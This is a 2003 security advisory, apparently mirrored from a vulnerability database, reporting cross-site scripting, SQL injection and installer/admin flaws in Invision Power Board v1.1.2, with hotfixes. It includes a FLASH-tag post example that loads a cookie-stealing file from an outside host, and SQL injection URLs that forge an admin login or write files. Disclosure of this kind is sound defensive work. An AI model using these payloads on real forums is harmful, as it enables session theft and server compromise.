Invision Power Board v1.1.2

2003-07-13T00:00:00
ID SECURITYVULNS:DOC:4823
Type securityvulns
Reporter Securityvulns
Modified 2003-07-13T00:00:00

Description

=========================================== Security REPORT Invision Power Board v1.1.2 ===========================================

Product: Power Board v1.1.2 (maybe earlier Versions) Vulnerablities: cross site scripting, sql-injection, install- and admin-issues, os-command execution Vuln.-Classes: Check out http://www.owasp.org/asac/ for more detailed information on "Attack Components" Vendor: http://www.invisionboard.com/ Vendor-Status: contacted "info@invisionpower.com" on Jul.11th 2003 Vendor-Patchs: http://www.invisionboard.com/downloads/chat.zip

Exploitable: Local: --- Remote: YES

============ Introduction ============

Visit "http://www.invisionboard.com/" for additional information.

===================== Vulnerability Details =====================

1) CROSS-SITE-SCRIPTING

OBJECT: Post.php

DESCRIPTION: by using [FLASH=h,w][/FLASH]-tags within a posting(Post-textarea) it is possible to execute arbitrary client-scripts ... thus leading to cookie-theft.

the usage of flash tags is allowed per default in "conf_global.php": ------ $INFO['allow_flash'] = '1'; ------

EXAMPLE-Content: ------ hey dude, whats up? [FLASH=2,2]http://anotherhost.ext/cookie-thief.swf[/FLASH] cu, jonnie ------

2) SQL-INJECTION

OBJECT: ipchat.php

DESCRIPTION: depending on mysql-version and/or drivers it is possible to change the result of sql-queries.

EXAMPLE(mySql > 4): ------ http://localhost/ibo/ipchat.php?password=1&username=9x%2527+union+select+%25271%2527,%2527c4ca4238a0b923820dcc509a6f75849b%2527,%2527admin%2527,1%252f+ ---*---

EXAMPLE(with file-permission set): ------ http://localhost/ibo/ipchat.php?password=1&username=admin%2527into+outfile+%2527[fullpath]%2527--+ ------

3) INSTALLER-, ADMIN-ISSUES

if for some reason(permissions, directory-moving) the installer-lockfile(install.lock) is missing, any user can use the "sm_install.php" - script.

once administrator .. one is able to:

A) execute arbitrary SQL-QUERIES thru "admin.php/act=mysql/code=runsql/query=sq" B) upload arbitrary files(including programms and scripts) into the "emoticons" directory.

.. thus leading to a "total" compromise of the http-servers account.

======= Remarks =======


==================== Recommended Hotfixes ====================

disallow flash in "conf_global.php". check for installer-lockfile.

software patch(es).

EOF Martin Eiszner / @2003WebSec.org

======= Contact =======

WebSec.org / Martin Eiszner Gurkgasse 49/Top14 1140 Vienna

Austria / EUROPE

mei@websec.org http://www.websec.org